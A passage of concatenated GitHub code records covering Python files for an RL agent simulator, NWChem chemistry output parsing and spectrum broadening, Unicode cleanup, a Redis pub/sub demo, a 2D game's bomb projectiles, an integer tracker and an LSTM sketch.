self.world.implementation.cell_transformation.rotation)\r\n self.visibility = Location_visibility(occlusions=self.occlusions_polygons)\r\n\r\n def is_valid_location(self, plocation):\r\n if self.arena_polygon.contains(plocation):\r\n for p in self.occlusions_polygons:\r\n if p.contains(plocation):\r\n return False\r\n return True\r\n else:\r\n return False\r\n\r\n def run(self):\r\n self.running = True\r\n self.thread = Thread(target=self.__process__)\r\n self.thread.start()\r\n\r\n def __move_agent__(self, agent_name):\r\n agent = self.agents_data[agent_name]\r\n agent.theta = normalize(agent.theta + agent.turning_speed * self.interval)\r\n new_location = Location(agent.location.x, agent.location.y)\r\n new_location.move(theta=agent.theta, dist=agent.speed * self.interval)\r\n if self.is_valid_location(new_location):\r\n self.agents_data[agent_name].location = new_location\r\n\r\n def stop(self):\r\n if self.thread:\r\n self.running = False\r\n self.thread.join()\r\n\r\n def __process__(self):\r\n t = Timer(self.interval)\r\n while self.running:\r\n t.reset()\r\n self.step()\r\n if self.real_time:\r\n pending_wait = self.interval - t.to_seconds()\r\n if pending_wait > 0:\r\n time.sleep(pending_wait)\r\n\r\n\r\n def step(self):\r\n for agent_name in self.agents.keys():\r\n if 
self.agents_data[agent_name].auto_update:\r\n action = self.agents[agent_name].get_action(self.get_observation(agent_name))\r\n self.agents_data[agent_name].speed = action.speed\r\n self.agents_data[agent_name].turning_speed = action.turning_speed\r\n for agent_name in self.agents.keys():\r\n self.__move_agent__(agent_name)\r\n\r\n def set_agent_action(self, agent_name: str, action: AgentAction):\r\n self.agents_data[agent_name].speed = action.speed\r\n self.agents_data[agent_name].turning_speed = action.turning_speed\r\n\r\n def __create_observation__(self, agent_name: str) -> dict:\r\n observation = dict()\r\n src = self.agents_data[agent_name].location\r\n for dst_agent_name in self.agents_data:\r\n dst_agent_data = self.agents_data[dst_agent_name]\r\n if self.visibility.is_visible(src, dst_agent_data.location):\r\n observation[dst_agent_name] = dst_agent_data\r\n else:\r\n observation[dst_agent_name] = None\r\n return observation\r\n\r\n def get_observation(self, agent_name: str) -> dict:\r\n return self.__create_observation__(agent_name)\r\n\r\n def show(self):\r\n for agent_name in self.agents_data:\r\n agent_data = self.agents_data[agent_name]\r\n self.display.agent(agent_name=agent_name,\r\n location=agent_data.location,\r\n rotation=to_degrees(agent_data.theta),\r\n color=agent_data.color,\r\n size=15,\r\n show_trajectory=False)\r\n self.display.update()\r\n\r\n def set_agent_position(self, pagent_name: str,\r\n plocation: Location,\r\n ptheta: float):\r\n self.agents_data[pagent_name].location = plocation\r\n self.agents_data[pagent_name].theta = ptheta\r\n\r\n def add_agent(self,\r\n pagent_name: str,\r\n pagent: Agent,\r\n plocation: Location,\r\n ptheta: float,\r\n pcolor: str = \"b\",\r\n pauto_update: bool = True):\r\n self.agents[pagent_name] = pagent\r\n self.agents_data[pagent_name] = AgentData(plocation=plocation,\r\n ptheta=ptheta,\r\n pspeed=0,\r\n pturning_speed=0,\r\n pcolor=pcolor,\r\n pauto_update=pauto_update)\r\n self.display.set_agent_marker(pagent_name, Agent_markers.arrow())\r\n","repo_name":"germanespinosa/RL_Environment","sub_path":"prey_env/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":5477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42814716171","text":"import numpy as np\nimport instrument_context as instr\n\n# This code gives the global coefficients and methods for other code files regarding the Mushroom project. 
It will\n# not execute any commands and should be called by other code files.\n\nextension_pdf = \"pdf\"\nextension_png = \"png\"\nextension_dat = \"dat\"\n\npath_performance = \"Performance/\"\npath_resolution = \"Resolution/\"\npath_geometry = \"Geometry/\"\npath_mcstas = \"McStas/\"\n\nq_unit_real = r\"$\\AA^{-1}$\" # the real unit of Q-vector\nq_unit_rlu = \"r.l.u.\" # reciprocal lattice unit\ne_joule = \"joule\"\ne_mev = \"meV\"\nhw_label = r\"$\\hbar\\omega$ ({:s})\".format(e_mev)\n\naxis_x = \"x\"\naxis_y = \"y\"\naxis_z = \"z\"\naxes = [axis_x, axis_y, axis_z]\n\ncolour_x = \"blue\"\ncolour_y = \"red\"\ncolour_z = \"darkgoldenrod\"\nrotation_stepsize = np.deg2rad(1) # sample rotation step size\nrotation_steps = 90\nmagnon_default = \"Default\"\nsample_rot_axis = (0, 0, 1)\nl_interest = 1\nanimation_frames = 100\n\nprefix_mush = \"Mushroom\"\nprefix_mcstas = \"McStas\"\n\ncomment_symbol = \"#\"\nterm_hw = \"hw\"\n\npg_orders = [1, 2]\n\n\ndef fname_write_dispersion(prefix, ki, order, path):\n name = \"{:s}{:.3f}_PG00{:d}\".format(prefix, ki * 1e-10, int(2 * order))\n name = \"\".join([path, name])\n name = \".\".join([name, extension_dat])\n return name\n\n\ndef fname_lineplot(hkl, point_interest, extension):\n dim_info = \"[{:d}{:d}{:d}]({:d},{:d},{:d})\".format(*hkl, *point_interest)\n filename = \"Correlation_ki[{:.1f},{:.1f}]_{:s}.{:s}\".format(instr.wavenumber_in_min * 1e-10,\n instr.wavenumber_in_max * 1e-10, dim_info,\n extension)\n return \"\".join([path_performance, filename])\n\n\ndef write_q_hw(prefix, ki, q_vectors, mush_hw, order):\n filename = fname_write_dispersion(prefix, ki, order, path=path_performance)\n file = open(filename, \"w+\")\n file.write(\"# {:s} (joule) {:e}\\n\".format(term_hw, mush_hw))\n file.write(\"# Q_x, Q_y, Q_z (m^{-1})\\n\")\n for i in range(q_vectors.shape[1]):\n file.write(\"{:e}, {:e}, {:e}\\n\".format(*q_vectors[:, i]))\n # file.write(\"{:e}, {:e}, {:e}, {:e}, {:e}\\n\".format(*q_vetors[:, i], hw_mush[i], hw_mag[i]))\n file.close()\n print(\"File written in: {:s}\".format(filename))\n\n\ndef write_dispersion(prefix, ki, q_vectors, intensities, order):\n filename = fname_write_dispersion(prefix, ki, order, path=path_mcstas)\n file = open(filename, \"w+\")\n file.write(\"# Q_x, Q_y, Q_z (m^{-1}), Intensity\\n\")\n for i in range(q_vectors.shape[1]):\n file.write(\"{:e}, {:e}, {:e}, {:e}\\n\".format(*q_vectors[:, i], intensities[i]))\n # file.write(\"{:e}, {:e}, {:e}, {:e}, {:e}\\n\".format(*q_vetors[:, i], hw_mush[i], hw_mag[i]))\n file.close()\n print(\"File written in: {:s}\".format(filename))\n\n\nmcstas_ana_angles = np.linspace(start=5 + 7, stop=170 - 8, num=11).astype(int)\ntype_bcc = \"bcc\"\ntype_cp = \"cP\"\nzero_tol = 1e-6","repo_name":"rtang-sidney/Mushroom","sub_path":"global_context.py","file_name":"global_context.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22563368427","text":"import re\nimport os\nimport time\nfrom subprocess import call\nimport numpy as np\n#import matplotlib.pyplot as plt\n\n\ndef replace_text_in_file(infile, oldstr, newstr):\n # Read in the file\n with open(infile, 'r') as file:\n filedata = file.read()\n\n # Replace the target string\n filedata = filedata.replace(oldstr, newstr)\n\n # Write the file out again\n with open(infile, 'w') as file:\n file.write(filedata)\n\n\ndef find_highest_number_xyz_file(directory):\n numbers = []\n prefixes = []\n for filename in os.listdir(directory):\n match = 
re.match(r'(.*?)(\\d*)(.xyz)', filename)\n prefixes.append(match.group(1))\n numbers.append(match.group(2))\n assert all([p==prefixes[0] for p in prefixes]), 'Some filename prefixes do not match'\n numbers = [int(n) for n in numbers]\n return '{}{:03d}{}'.format(match.group(1), max(numbers), match.group(3))\n\n\ndef read_last_line(file):\n#https://stackoverflow.com/questions/3346430/what-is-the-most-efficient-way-to-get-first-and-last-line-of-a-text-file\n with open(file, \"rb\") as f:\n f.readline() # Read the first line.\n f.seek(-2, os.SEEK_END) # Jump to the second last byte.\n while f.read(1) != b\"\\n\": # Until EOL is found...\n f.seek(-2, os.SEEK_CUR) # ...jump back the read byte plus one more.\n last = f.readline() # Read last line.\n return last\n\n\ndef check_calculation_successful(outfile):\n try:\n res = read_last_line(outfile)[:12] == b' Total times'\n return res\n except IOError:\n return False\n\n\ndef get_highest_occupied_beta_movec(infile): #Deprecated, kept for backwards compatibility\n with open(infile, 'r') as f:\n content = f.read()\n betaorbitalsindex = content.index('DFT Final Beta Molecular Orbital Analysis')\n betaorbitals = content[betaorbitalsindex:]\n occ0index = betaorbitals.index('Occ=0')\n f.seek(betaorbitalsindex + occ0index)\n vectorindex = betaorbitals.index('Vector', occ0index - 14, occ0index)\n f.seek(betaorbitalsindex + vectorindex)\n r = f.readline()\n return int(r.split()[1]) - 1\n\n\ndef get_highest_occupied_movec(infile, channel='beta'):\n if channel == 'beta':\n channel = 'Beta'\n elif channel == 'alpha':\n channel = 'Alpha'\n else:\n raise RuntimeError('Channel must be \\'alpha\\' or \\'beta\\'')\n with open(infile, 'r') as f:\n content = f.read()\n orbitalsindex = content.index('DFT Final {} Molecular Orbital Analysis'.format(channel))\n orbitals = content[orbitalsindex:]\n occ0index = orbitals.index('Occ=0')\n f.seek(orbitalsindex + occ0index)\n vectorindex = orbitals.index('Vector', occ0index - 14, occ0index)\n f.seek(orbitalsindex + vectorindex)\n r = f.readline()\n return int(r.split()[1]) - 1\n\n\ndef get_number_alphas_betas(infile):\n res = {}\n with open(infile, 'r') as f:\n content = f.read()\n generalinfo = content[content.index('General Information') : content.index('XC Information')]\n res['alphas'] = int([s for s in generalinfo.splitlines() if 'Alpha' in s][0].split(':')[1])\n res['betas'] = int([s for s in generalinfo.splitlines() if 'Beta' in s][0].split(':')[1])\n return res\n\n\ndef start_job():\n return call(['msub', 'job.run'])\n\n\ndef wait_for_calculation_completion(outfilename, maxwait=3600*24):\n w = 0\n while not os.path.isfile(outfilename):\n print('waiting for job to start: {}s'.format(w), end='\\r')\n w = w + 1\n time.sleep(1)\n\n print('output file created. 
blocking for maxwait {}s'.format(maxwait))\n i = 0\n while not check_calculation_successful(outfilename):\n if i < maxwait:\n time.sleep(1)\n i = i + 1\n else:\n raise RuntimeError('Output file not created within {}s timeout period.'.format(maxwait))\n\n\ndef convert_mol_to_xyz(infile):\n name = infile.split('.mol')[0]\n with open(infile, 'r') as file:\n lines = file.readlines()\n\n istart = 0\n for l in lines:\n if 'V2000' in l.split() or 'V3000' in l.split():\n break\n else:\n istart = istart + 1\n\n atomre = re.compile(r'\\s+(-?\\d+\\.\\d+)\\s+(-?\\d+\\.\\d+)\\s+(-?\\d+\\.\\d+)\\s+(\\w+)\\s+')\n atoms = []\n for l in lines[istart + 1:]:\n m = atomre.match(l)\n if m is not None:\n atoms.append(m.groups())\n else:\n break\n\n with open(name + '.xyz', 'w') as outfile:\n outfile.write(str(len(atoms)) + '\\n')\n outfile.write('File made automatically with Python script using input mol file. (v1)\\n')\n for a in atoms:\n outfile.write('{}{:>15}{:>15}{:>15}\\n'.format(a[-1], a[0], a[1], a[2]))\n\n\ndef center_xyz(infile, targetline):\n with open(infile, 'r') as file:\n with open(infile.split('.xyz')[0] + '_centered.xyz', 'w') as newfile:\n for i in range(targetline - 1):\n file.readline()\n target = file.readline().split()\n for i in range(1, len(target)):\n target[i] = float(target[i])\n\n file.seek(0)\n\n newfile.write(file.readline())\n newfile.write(file.readline())\n while True:\n r = file.readline().split()\n if len(r) != 4:\n break\n for i in range(1, len(r)):\n r[i] = float(r[i]) - target[i]\n newfile.write('{} {:>15.5f}{:>15.5f}{:>15.5f}\\n'.format(*r))\n newfile.write('\\n')\n return infile.split('.xyz')[0] + '_centered.xyz'\n\n\ndef read_xyz(file):\n with open(file, 'r') as f:\n lines = f.readlines()\n atoms = []\n coords = []\n for l in lines[2:]: #XYZ files must have two header rows\n split = l.split()\n atoms.append(split[0])\n coords.append([float(x) for x in split[1:]])\n assert len(atoms) == len(coords), 'Something went wrong, len of atoms doesnt equal length of coords'\n return atoms, coords\n\n\ndef basic_multiplicity_from_atoms(atoms):\n import periodictable\n electrons = 0\n for a in atoms:\n electrons += periodictable.__getattribute__(a).number\n print('{} electrons, which means basic multiplicity {}'.format(electrons, electrons % 2 + 1))\n return electrons % 2 + 1\n\n\ndef make_xyz_animation(basename, directory=None):\n if directory is None:\n directory = os.getcwd() + '/'\n \n filere = re.compile(r'{}\\d\\d\\d.xyz'.format(basename))\n \n xyzfiles = []\n for f in os.listdir(directory):\n if filere.match(f) is not None:\n xyzfiles.append(f)\n \n if not xyzfiles:\n raise FileNotFoundError('No files matching {}###.xyz were found.'.format(basename))\n \n assert not os.path.exists(directory+'{}animation.xyz'.format(basename)), 'File already exists'\n \n with open(directory+'{}animation.xyz'.format(basename), 'w') as outfile:\n for xyz in sorted(xyzfiles):\n with open(directory+xyz, 'r') as infile:\n outfile.write(infile.read())\n\n\n\ndef read_dft_transitions_file(path):\n return np.loadtxt(path).T\n\n\n#https://scipython.com/book/chapter-8-scipy/examples/the-voigt-profile/\ndef Lorentzian(x, xc, gamma):\n \"\"\" Return Lorentzian line shape at x with HWHM gamma \"\"\"\n return gamma / np.pi / ((x-xc)**2 + gamma**2)\n\n\ndef spectrum_from_transitions(transitions, lorentz_ev=1, erange=None, numpoints=1000, peaknorm=True):\n x, y = transitions\n if erange is not None:\n good = np.logical_and(x >= erange[0], x <= erange[1])\n x, y = x[good], y[good]\n x_eval = 
np.linspace(erange[0], erange[1], numpoints)\n else:\n xmin = np.min(x)\n xmax = np.max(x)\n padding = (xmax - xmin) / 2\n x_eval = np.linspace(xmin - padding, xmax + padding, numpoints)\n \n spectrum = np.zeros_like(x_eval)\n for e, a in zip(x, y):\n spectrum += a * Lorentzian(x_eval, e, lorentz_ev/2)\n \n if peaknorm:\n spectrum = spectrum / np.max(spectrum)\n\n return np.array([x_eval, spectrum])\n\n\n#Thank you stackoverflow\n#https://stackoverflow.com/questions/24143320/gaussian-sum-filter-for-irregular-spaced-points\ndef gaussian_broaden(spectrum, width_ev=2, numpoints=1000, xmin=None, xmax=None):\n x, y = spectrum\n if xmin is None:\n xmin = np.min(x)\n if xmax is None:\n xmax = np.max(x)\n x_eval = np.linspace(xmin, xmax, numpoints)\n sigma = width_ev/(2*np.sqrt(2*np.log(2)))\n\n delta_x = x_eval[:, None] - x\n weights = np.exp(-delta_x*delta_x / (2*sigma*sigma)) / (np.sqrt(2*np.pi) * sigma)\n weights /= np.sum(weights, axis=1, keepdims=True)\n y_eval = np.dot(weights, y)\n\n return np.array([x_eval, y_eval])\n\n\ndef plot_spectrum_and_transitions(transitions, lorentz_ev=1, erange=None, \n numpoints=1000, gaussian_ev=None, show=True):\n import matplotlib.pyplot as plt\n spectrum = spectrum_from_transitions(transitions, lorentz_ev=lorentz_ev, \n erange=erange, numpoints=numpoints, peaknorm=False)\n x, y = spectrum\n norm = np.max(y)\n\n fig, ax = plt.subplots()\n ax.plot(x, y / norm)\n\n #rescale so that stem matches spectral height\n rescale = Lorentzian(0, 0, lorentz_ev/2)\n xs, ys = transitions\n if erange is not None:\n good = np.logical_and(xs >= erange[0], xs <= erange[1])\n xs, ys = xs[good], ys[good]\n markerline, stemlines, baseline = ax.stem(xs, ys * rescale / norm, \n basefmt='k', linefmt='C0-')\n plt.setp(baseline, visible=False)\n plt.setp(stemlines, 'linewidth', 1)\n plt.setp(markerline, 'markersize', 3)\n plt.xlabel('Energy (eV)')\n\n if show:\n plt.show()\n\n return fig\n\n\n# def parse_roots_from_tddft_output(file):\n# with open(file, 'r') as f:\n# lines = f.readlines()\n \n# rootre = re.compile('Root\\s+\\d+')\n# transitionre = re.compile(r'\\s+Occ\\.\\s+(\\d+)\\s+(alpha|beta)\\s+\\w\\s+-+\\s+Virt.\\s+(\\d+)\\s+(alpha|beta)\\s+\\w\\s+(-?\\d+\\.\\d+)\\s+')\n \n# rootlinenums = []\n# for i, l in enumerate(lines):\n# if rootre.search(l):\n# rootlinenums.append(i)\n \n# rootdict = {}\n# for i in range(len(rootlinenums)):\n# rootdict[i + 1] = {}\n \n# for k, d in rootdict.items():\n# d['transitions'] = []\n# if k != len(rootdict):\n# lower = rootlinenums[k-1]\n# upper = rootlinenums[k]\n# else:\n# lower = rootlinenums[k-1]\n# upper = None\n# for l in lines[lower:upper]:\n# m = transitionre.match(l)\n# if m:\n# trans = {}\n# trans['occ ({})'.format(m.group(2))] = m.group(1)\n# trans['virt ({})'.format(m.group(4))] = m.group(3)\n# trans['coeff'] = float(m.group(5))\n# d['transitions'].append(trans)\n\n# dm = re.match(r'\\s+Dipole Oscillator Strength\\s+(-?\\d+\\.\\d+)\\s+', l)\n# if dm:\n# d['Dipole Oscillator Strength'] = float(dm.group(1))\n\n# qm = re.match(r'\\s+Electric Quadrupole\\s+(-?\\d+\\.\\d+)\\s+', l)\n# if qm:\n# d['Electric Quadrupole'] = float(qm.group(1))\n\n# mm = re.match(r'\\s+Magnetic Dipole\\s+(-?\\d+\\.\\d+)\\s+', l)\n# if mm:\n# d['Magnetic Dipole'] = float(mm.group(1))\n\n# tm = re.match(r'\\s+Total Oscillator Strength\\s+(-?\\d+\\.\\d+)\\s+', l)\n# if tm:\n# d['Total Oscillator Strength'] = float(tm.group(1))\n\n# auev = re.match(r'\\s+Root\\s+\\d+\\s+\\w\\s+(-?\\d+\\.\\d+)\\s+a.u.\\s+(-?\\d+\\.\\d+)\\s+eV\\s+', l)\n# if auev:\n# d['a.u.'] = 
auev.group(1)\n#                 d['eV'] = auev.group(2)\n\n#             s2 = re.match(r'\\s+<S\\*\\*2>\\s+=\\s+(-?\\d+\\.\\d+)\\s+', l)\n#             if s2:\n#                 d['<S**2>'] = s2.group(1)\n    \n#     return rootdict\n\n\ndef write_xyz_from_atoms_coords(filename, atoms, coords, comment=None):\n    if '.xyz' not in filename:\n        filename += '.xyz'\n    with open(filename, 'w') as outfile:\n        outfile.write(str(len(atoms)) + '\\n')\n        outfile.write('{}\\n'.format(comment))\n        for a, c in zip(atoms, coords):\n            outfile.write('{}{:>15.5f}{:>15.5f}{:>15.5f}\\n'.format(a, *c))\n\n\ndef take_erange(energies, intensities, erange):\n    good = np.where(np.logical_and(energies < erange[1], energies > erange[0]))\n    return np.array([energies[good], intensities[good]])\n\n\ndef integral_normalize(energies, intensities, erange):\n    e, i = take_erange(energies, intensities, erange)\n    return np.array([energies, intensities / np.sum(i)])\n\n\ndef integral_norm_over_erange(x, y, erange):\n    good = np.where(np.logical_and(x>erange[0], x<erange[1]))\n    return np.array([x, y / np.sum(y[good])])\n\n\ndef scaled_spectrum_from_transitions(transitions, lorentz_ev=1, erange=None, numpoints=1000, peaknorm=True):\n    x, y = transitions\n    if erange is not None:\n        good = np.logical_and(x >= erange[0], x <= erange[1])\n        x, y = x[good], y[good]\n        x_eval = np.linspace(erange[0], erange[1], numpoints)\n    else:\n        xmin = np.min(x)\n        xmax = np.max(x)\n        padding = (xmax - xmin) / 2\n        x_eval = np.linspace(xmin - padding, xmax + padding, numpoints)\n    \n    spectrum = np.zeros_like(x_eval)\n    \n    #do proper energy scaling\n    sy = x ** 2 * y\n    y = sy / sy.sum()\n    \n    for e, a in zip(x, y):\n        spectrum += a * Lorentzian(x_eval, e, lorentz_ev/2)\n    \n    if peaknorm:\n        spectrum = spectrum / np.max(spectrum)\n\n    return np.array([x_eval, spectrum])\n","repo_name":"wholden/NWChemScripting","sub_path":"NWChemScripting/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":13740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"14837214988","text":"s = 'pýtĥöñ\\fis\\tawesome\\r\\n'\n\nremap = {\n    ord('\\t') : ' ',\n    ord('\\f') : ' ',\n    ord('\\r') : None # Deleted\n}\n\na = s.translate(remap)\n\nimport unicodedata\nimport sys\ncmb_chrs = dict.fromkeys(c for c in range(sys.maxunicode) if unicodedata.combining(chr(c)))\nb = unicodedata.normalize('NFD', a)\nb.translate(cmb_chrs)\n\ndigitmap = { c: ord('0') + unicodedata.digit(chr(c)) for c in range(sys.maxunicode) if unicodedata.category(chr(c)) == 'Nd' }\n","repo_name":"tomtom0516/python-cookbook-3rd-edition","sub_path":"02 String and Text/B12unicodeclean.py","file_name":"B12unicodeclean.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"86573852831","text":"\nimport redis\nimport threading\nimport redisMQ\nimport json\n\n# Redis connection\n\ndef shengchan(body):\n    redisMQ.re_queue.publish(\"liao\", body)\n\n\ndef xioafei1():\n    ps = redisMQ.re_queue.pubsub()\n    ps.subscribe('liao')  # subscribe to messages from the 'liao' channel\n    for item in ps.listen():  # listening state: fetch each message as soon as it is published\n        if item['type'] == 'message':\n            #print(item['channel']) CORE BACKEND\n            print(item['data'])\n            print('11')\ndef xioafei2():\n    ps = redisMQ.re_queue.pubsub()\n    ps.subscribe('liao')  # subscribe to messages from the 'liao' channel\n    for item in ps.listen():  # listening state: fetch each message as soon as it is published\n        if item['type'] == 'message':\n            #print(item['channel']) CORE BACKEND\n            print(item['data'])\n            print('22')\nt3 = threading.Thread(target=xioafei1,)\nt3.start()\nt4 = threading.Thread(target=xioafei2,)\nt4.start()\n","repo_name":"wushiqi/post","sub_path":"thread_server.py","file_name":"thread_server.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"23764458807","text":"from pico2d 
import*\nimport game_world\nimport game_framework\nimport particle\nimport unit_functions\n\nclass FlyingState:\n\n @staticmethod\n def enter(unit):\n pass\n\n @staticmethod\n def exit(unit):\n unit.search_unit_in_exploding_range()\n\n @staticmethod\n def do(unit):\n if unit.collide():\n unit.add_event(ExplodingState)\n\n unit.dir = math.atan2(unit.destination_y - unit.y, unit.destination_x - unit.x)\n\n unit.x += unit.RUN_SPEED_PPS * math.cos(unit.dir) * game_framework.frame_time\n unit.y += unit.RUN_SPEED_PPS * math.sin(unit.dir) * game_framework.frame_time\n\n unit.generate_smoke_time -= game_framework.frame_time\n if unit.generate_smoke_time <= 0:\n particle.Smoke(unit.x, unit.y)\n unit.generate_smoke_time += 0.08\n\n\n\n @staticmethod\n def draw(unit):\n cx, cy = unit_functions.get_cx_cy(unit.x, unit.y)\n\n unit.image.composite_draw( unit.dir, '', cx, cy, unit.IMAGE_SIZE, unit.IMAGE_SIZE)\n\n\nclass ExplodingState:\n\n @staticmethod\n def enter(unit):\n unit.explode_sound.play()\n particle.Explosion(unit.x, unit.y)\n game_world.remove_object(unit)\n\n @staticmethod\n def exit(unit):\n game_world.remove_object(unit)\n\n @staticmethod\n def do(unit):\n pass\n\n @staticmethod\n def draw(unit):\n pass\n\n\n\nclass BombProjectile:\n\n def __init__(self):\n self.IMAGE_SIZE = 0\n\n self.PIXEL_PER_METER = (100 / 0.02)\n self.RUN_SPEED_KMPH = 0.1\n self.RUN_SPEED_MPM = (self.RUN_SPEED_KMPH * 1000.0 / 60.0)\n self.RUN_SPEED_MPS = (self.RUN_SPEED_MPM / 60.0)\n self.RUN_SPEED_PPS = (self.RUN_SPEED_MPS * self.PIXEL_PER_METER)\n\n self.EXPLODING_TIME_PER_ACTION = 0.3\n self.EXPLODING_ACTION_PER_TIME = 1.0 / self.EXPLODING_TIME_PER_ACTION\n self.EXPLODING_FRAMES_PER_ACTION = 4\n\n self.generate_smoke_time = 0\n\n self.valid_target_list = []\n self.target = None\n self.frame = 0\n self.init_time = 0\n self.radius = 0\n\n self.x, self.y = 0, 0\n self.destination_x, self.destination_y = 0, 0\n self.dir = 0\n self.damage = 0\n\n self.event_que = []\n self.cur_state = FlyingState\n\n self.explode_sound = None\n\n def add_self(self):\n game_world.add_object(self, 4)\n\n def attack_target(self, o):\n o.hp -= self.damage\n\n def search_unit_in_exploding_range(self):\n if (self.valid_target_list is None) is False:\n for o in self.valid_target_list:\n if self.collide_explosion_radius(o):\n self.attack_target(o)\n\n def collide(self):\n if self.destination_x - 20 > self.x: return False\n if self.destination_y + 20 < self.y: return False\n if self.destination_x + 20 < self.x: return False\n if self.destination_y - 20 > self.y: return False\n return True\n\n def collide_explosion_radius(self, o):\n left, bottom, right, top = o.get_bb()\n if self.x - self.radius > right: return False\n if self.y + self.radius < bottom: return False\n if self.x + self.radius < left: return False\n if self.y - self.radius > top: return False\n return True\n\n\n######################################################################\n\n def add_event(self, event):\n self.event_que.insert(0, event)\n\n def update(self):\n self.cur_state.do(self)\n if len(self.event_que) > 0:\n event = self.event_que.pop()\n self.cur_state.exit(self)\n self.cur_state = event\n self.cur_state.enter(self)\n\n def draw(self):\n self.cur_state.draw(self)\n\n\n\n\nclass ProjectileBazookaBug(BombProjectile):\n image = None\n\n def __init__(self, x, y, target, vaild_target_list, damage):\n self.IMAGE_SIZE = 50\n\n self.PIXEL_PER_METER = (100 / 0.02)\n self.RUN_SPEED_KMPH = 0.2\n self.RUN_SPEED_MPM = (self.RUN_SPEED_KMPH * 1000.0 / 60.0)\n self.RUN_SPEED_MPS = 
(self.RUN_SPEED_MPM / 60.0)\n self.RUN_SPEED_PPS = (self.RUN_SPEED_MPS * self.PIXEL_PER_METER)\n\n self.generate_smoke_time = 0.1\n\n self.valid_target_list = vaild_target_list\n self.target = target\n self.frame = 0\n self.init_time = 0\n self.radius = 40\n\n self.x, self.y = x, y\n self.destination_x, self.destination_y = target.x, target.y\n self.dir = math.atan2(self.destination_y - self.y, self.destination_x - self.x)\n\n self.damage = damage\n\n self.event_que = []\n self.cur_state = FlyingState\n\n self.explode_sound = load_wav('resource\\\\sound\\\\bomb_explosion.wav')\n self.explode_sound.set_volume(50)\n\n if ProjectileBazookaBug.image is None:\n ProjectileBazookaBug.image = load_image('resource\\\\image\\\\projectile\\\\bazooka_bomb.png')\n\n self.add_self()\n\n\nclass ProjectileBomBardDragonFly(BombProjectile):\n image = None\n\n def __init__(self, x, y, target, vaild_target_list, damage):\n self.IMAGE_SIZE = 90\n\n self.PIXEL_PER_METER = (100 / 0.02)\n self.RUN_SPEED_KMPH = 0.2\n self.RUN_SPEED_MPM = (self.RUN_SPEED_KMPH * 1000.0 / 60.0)\n self.RUN_SPEED_MPS = (self.RUN_SPEED_MPM / 60.0)\n self.RUN_SPEED_PPS = (self.RUN_SPEED_MPS * self.PIXEL_PER_METER)\n\n self.generate_smoke_time = 0.1\n\n self.valid_target_list = vaild_target_list\n self.target = target\n self.frame = 0\n self.init_time = 0\n self.radius = 50\n\n self.x, self.y = x, y\n self.destination_x, self.destination_y = target.x, target.y\n\n if self.x <= self.destination_x:\n self.dir = 0\n else:\n self.dir= math.pi\n\n self.damage = damage\n\n self.event_que = []\n self.cur_state = FlyingState\n\n self.explode_sound = load_wav('resource\\\\sound\\\\bomb_explosion.wav')\n self.explode_sound.set_volume(32)\n self.fire_sound = load_wav('resource\\\\sound\\\\bomb_fall.wav')\n self.fire_sound.set_volume(20)\n\n if ProjectileBomBardDragonFly.image is None:\n ProjectileBomBardDragonFly.image = load_image('resource\\\\image\\\\projectile\\\\dragon_bomb.png')\n\n self.add_self()\n\n self.fire_sound.play()\n","repo_name":"hitmontop/2dgame","sub_path":"unit_bomb_projectile.py","file_name":"unit_bomb_projectile.py","file_ext":"py","file_size_in_byte":6306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71709863787","text":"import logging\nimport time\nfrom collections import Counter\n\nmillis = lambda: time.time()*1000\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(format='%(levelname)s:%(name)s:%(asctime)s: %(message)s')\nlogger.setLevel(logging.INFO)\nlogging.debug(\"Done loading logging\")\n\n\nclass IntTracker:\n def __init__(self, n_track):\n self.n_track = n_track\n self.queue = []\n self.counter = Counter()\n pass\n def process(self, array):\n for item in array:\n if item not in self.counter:\n self.counter[item] = 1\n else:\n self.counter[item] += 1\n if item not in self.queue:\n logger.debug(\"if item not in self.queue: {}\".format(self.queue))\n self.queue.append(item)\n logger.debug(\"queue append: {}\".format(self.queue))\n self.queue.sort()\n if len(self.queue) > 5:\n removed_items = self.queue[:-5]\n for removed_item in removed_items:\n del self.counter[removed_item]\n self.queue = self.queue[-5:]\n logger.debug(\"queue: {}\".format(self.queue))\n return self.queue\n","repo_name":"clayrichardson/213bc673-eea4-4972-98bb-35af9ba9ffce","sub_path":"lib/int_tracker.py","file_name":"int_tracker.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
+{"seq_id":"25791328237","text":"from __future__ import print_function\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.optim as optim\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nD = 5\n\n# model = LSTMCell.train(X, y)\n# model.predict(X) # -> y\n\ndef learn(py):\n lstm = nn.LSTMCell(10, 10)\n matrix = py.reshape(10, 10)\n tensor = torch.from_numpy(matrix)\n input = Variable(tensor.double())\n # print(input[0])\n # input = Variable(torch.randn(6, 3, 10))\n hidden = Variable(torch.randn(3, 10).double())\n cell = Variable(torch.randn(3, 10).double())\n output = []\n for i, input_t in enumerate(input.chunk(input.size(1), dim=1)):\n hidden, cell = lstm(input_t, (hidden, cell))\n output.append(hidden)\n return output\n\ndef predict(px):\n return np.sin(px / D)\n\ndef run():\n x = np.array(range(100))\n y = np.sin(x / D)\n px = x[-1] + np.array(range(100))\n py = predict(px)\n# MAT PLOT\n plt.scatter(x, y)\n plt.scatter(px, py, c='r')\n plt.show()\n\nx = np.array(range(100))\nlearn(x)\n","repo_name":"arcoyk/LSTM","sub_path":"time_sequence_prediction/LSTMCell.py","file_name":"LSTMCell.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 